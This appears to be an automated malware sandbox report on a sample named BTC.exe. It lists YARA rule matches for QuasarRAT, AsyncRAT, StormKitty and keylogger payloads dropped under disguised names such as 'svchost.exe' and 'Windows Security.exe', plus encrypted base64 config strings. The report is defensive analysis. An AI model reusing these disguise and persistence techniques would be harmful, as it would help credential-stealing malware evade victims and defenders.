                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarRAT author = ditekSHen, description = QuasarRAT payload
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarRAT author = ditekSHen, description = QuasarRAT payload
                            Source: 00000007.00000000.2009427541.0000000000F62000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                            Source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 00000005.00000002.4469944759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                            Source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
                            Source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                            Source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                            Source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: C:\Users\user\AppData\Roaming\Cracked.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                            Source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                            Source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                            Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                            Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                            Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: MALWARE_Win_QuasarRAT author = ditekSHen, description = QuasarRAT payload
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: MALWARE_Win_QuasarRAT author = ditekSHen, description = QuasarRAT payload
                            Source: BTC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: BTC.exe, Program.csCryptographic APIs: 'TransformFinalBlock'
                            Source: Windows Defender Service Host.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: Windows Defender Service Host.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: Windows Defender Service Host.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                            Source: Cracked.exe.0.dr, Settings.csBase64 encoded string: 'Qn8SqsI3jUQBAUjqjalm3oJMLd/PbscIFd6rNbQ5sRZNn4xQ1j9+smFfWlHEI1gikBTJ0XwXBbd7vrP4j7UNlA==', 'WwGUu43hHVOQw4bhNIONAbpY8cH0OewHJ6IJs1kKJ+cu/7wi9YsKufGrVcAtJreaghEgt3mKwnnP4jUNLVCerlv/S0eftqeHDCa8kAVIzT4=', 'wxTsCpYNu1AiEBtW0/wF2Xsle2ZY6OiGu6IE3jMxekVMgibQsLE47ouxwB/hD5QIHh1HjkaDjgCTz5TgDgJNhfsNtnq3Hb5jHb1NqETf8pbbLS5GP3lA9At6RUJ33ZCh', 'ywn+OxV3qgXWKyUE+iTmL0mFT3aNwmXqH/A241apHqZR5xfPAY4d1oDzbkJMbCrW0mumEKlXNebqerwRdgmFPQ==', 'gqkeIT57xRAiTK0cwZ6vsPBVrF0/NDUstza9ynwGWtvf8Ikec+nCNSi1LMiuTooq/10AN/TPgcmVUIqCUEdSC+N3b3XTX/vyxzaoictl2YTNTKnr2Wd0CTayJNMJJO2HnwzX/IcrtvB2OEom1X7k89XKpqtumdHAbhG5k5Pq+iJJMnEILpumZQPlFyx0gLmYeoB6RStu4pjFHTRwRLjeGFyya8H5z/JC57mRUfBEldhE1ixIz594/p7YKZO7vFAwOcX5DOjdIwfkQgr4Pm0cYGAulm7CltV5JIpNvZFUSdPuSgg4DbHA/9otLbVYpvJVbeQYyKYXPYHDWcZdfOIXeIHD3vHTmyratXNG79vHJKw09fi94gorFFsXvK507/lb9VMt0ZaMOklRzlEANuezAw6dgaAuo70n07xZAm122efC53PMp3JBRwWMdQJYV0lt7wOS6WFsAnTkq5g8w7k9rq9m6IsC+3xK56aCEOg1KAskBhtSRxGesNc2R2caPu2ST8jMaEFbzpm9hkSiE04B5lK2z0aamcTFnVTr3VNjgEYQlYIEH3lA0W0i6h7IXb6egtq6xFXa+LRts6CuatPS/hBpBEZsx6jr9cd5KLbQE7aFo7V+SltqBkxzUDlJty7VFLQyueR9/wMNL8OpmuZB6LEjm5p/dOFq0vXxu2BPfB/rIIeYUO6LYjPOPnRGM5q8AljGk4DuN8EcGDBPyi7MNI7LK6nCKbeHYcWkgJ8bYBWSYY9QQyDfHgEARc0boHkf5Fyt9HqxkoNRqmZtpEFDIkGBNbjFjcFZ7D6kj6zg27/qRT+gAKGPURs4CpYTp6Uds5AnnAYUfb72mlesTlGaLk+nCHKfcclYpFgWL+01zq/jDQyR9nqBQe4F5ik+Hp6B4zLWK+blzxbwYBFyw4VkokxHzk0biXCYez/dQI742PTZZAO/olRR4jnSClF8t3MRRw6AjUTN9wwtDR7+M00ii/bsoBwgu6PCOgeXKM039XR5LJ1R6Au3nwJKEhbc1xfuO37uBzeAa6HCGc2Cx28JTwqHoz3BMBzvBWb59jvsNEUeBB6ON1pakDvMopL1ccCe', 'Q/UCu6O47CHFGS6KCBvM4o1+Usq+s6Ccg2UKnm/GJqCVWrBQ3L9hKjojrlgaefg1NwBAJ8ORnVT5JMNcdmWzFw==', 'j/7gTotOxXp2+vfq93u+6A2lmLCVvVGgv+oHm8X+q2MPS5v1jKAaieoUVjlLC4fPtYq6cVnDufXuNZZwXbzmLg==', '/h1sm9P1a0vsAHGS8FWEGBd85oCTGrU9bR3qkhrL/yHSsHXp+/O5kqUUccsMCZ4KW+AmDJ3iXa56+31XiEJM+Q=='
